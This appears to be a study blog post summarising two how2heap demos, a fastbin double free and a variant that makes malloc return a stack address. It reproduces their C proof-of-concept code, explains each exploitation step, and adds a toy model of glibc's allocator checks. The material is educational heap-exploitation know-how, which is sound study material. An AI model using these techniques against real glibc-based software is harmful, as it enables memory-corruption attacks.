how2heap Summary
Today let's summarize how2heap. I went through it roughly before, but recently I found there were still many details I didn't understand, so I have come back to debug how2heap again.
Let's go in order.
0x01 fastbin_dup:
Source:
```c
#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    fprintf(stderr, "1st malloc(8): %p\n", malloc(8));
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "3rd malloc(8): %p\n", malloc(8));
}
```
Next, let's run the program:
We can see that this is a double-free demonstration against the fastbin allocator. Fastbins are LIFO (last in, first out): after free(a), free(b), free(a) the bin is a -> b -> a, so subsequent allocations return a, b, a, b, a, ... in a cycle. You can try allocating a few more times to confirm this.
0x02 fastbin_dup_into_stack:
Source:
```c
#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
            "returning a pointer to a controlled location (in this case, the stack).\n");

    unsigned long long stack_var;

    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
            "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long long *d = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
            "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
            "so that malloc will think there is a free chunk there and agree to\n"
            "return a pointer to it.\n", a);
    stack_var = 0x20;

    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}
```
Next, let's run the program:
You can see that the next allocation hands back the stack region we forged as if it were a heap chunk. The key steps are: set stack_var = 0x20 so it looks like a valid size field, then write the address stack_var - 8 into *d, which is the fd field of the fastbin chunk at the head of the list. The next malloc then returns a chunk pointing at stack + 8.
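As a footnote to both demos above (0x01 and 0x02), here is a small C model, added for this summary and not code from how2heap or glibc, of the three allocator checks involved: the fastbin head check that the interleaved free(a), free(b), free(a) sequence slips past, the size check that forces the fake 0x20 in 0x02, and the tcache key stamp that glibc 2.29 added to close the gap. The chunk layout, the TCACHE_KEY value and the function names are my simplifications.

```c
#include <stddef.h>
/* Toy model of one glibc fastbin plus the tcache double-free stamp, written for
 * this summary (not how2heap or glibc code) to show which free() sequences the
 * allocator's own checks catch and which slip through. */
typedef struct chunk {
    size_t size;       /* size field; 0x20 for a 64-bit malloc(8) chunk */
    struct chunk *fd;  /* "next free" pointer, stored in the user data */
    size_t key;        /* tcache_entry->key stamp (glibc >= 2.29), modelled */
} chunk;
static chunk *fastbin_top;  /* head of the LIFO fastbin */

/* _int_free's "double free or corruption (fasttop)" check compares only the
 * head, so free(a);free(a) is caught but free(a);free(b);free(a) is not. */
int fastbin_free(chunk *p) {
    if (fastbin_top == p) return 0;  /* real glibc aborts here */
    p->fd = fastbin_top;
    fastbin_top = p;
    return 1;
}

/* _int_malloc's "malloc(): memory corruption (fast)" check: the head chunk's
 * size must match the bin, which is why 0x02 has to plant stack_var = 0x20. */
chunk *fastbin_malloc(size_t bin_size) {
    chunk *v = fastbin_top;
    if (v == NULL || v->size != bin_size) return NULL;  /* glibc aborts */
    fastbin_top = v->fd;
    return v;
}

/* tcache stamps every freed chunk; one arriving already stamped is reported as
 * "free(): double free detected in tcache 2" whatever its list position. */
#define TCACHE_KEY 0x5a5a5a5au
int tcache_free(chunk *p) {
    if (p->key == TCACHE_KEY) return 0;
    p->key = TCACHE_KEY;
    return 1;
}

/* Replays fastbin_dup.c: returns 1 when the back-to-back double free is refused,
 * the interleaved one is accepted, and malloc then hands out a, b, a in turn. */
int replay_fastbin_dup(void) {
    static chunk a = { 0x20, NULL, 0 }, b = { 0x20, NULL, 0 };
    fastbin_top = NULL;
    if (fastbin_free(&a) != 1 || fastbin_free(&a) != 0) return 0;
    if (fastbin_free(&b) != 1 || fastbin_free(&a) != 1) return 0;
    return fastbin_malloc(0x20) == &a && fastbin_malloc(0x20) == &b
        && fastbin_malloc(0x20) == &a;
}
```

Running tcache_free() twice on the same chunk shows why the same sequence is refused on glibc 2.29 and later, independent of where the chunk sits in the bin.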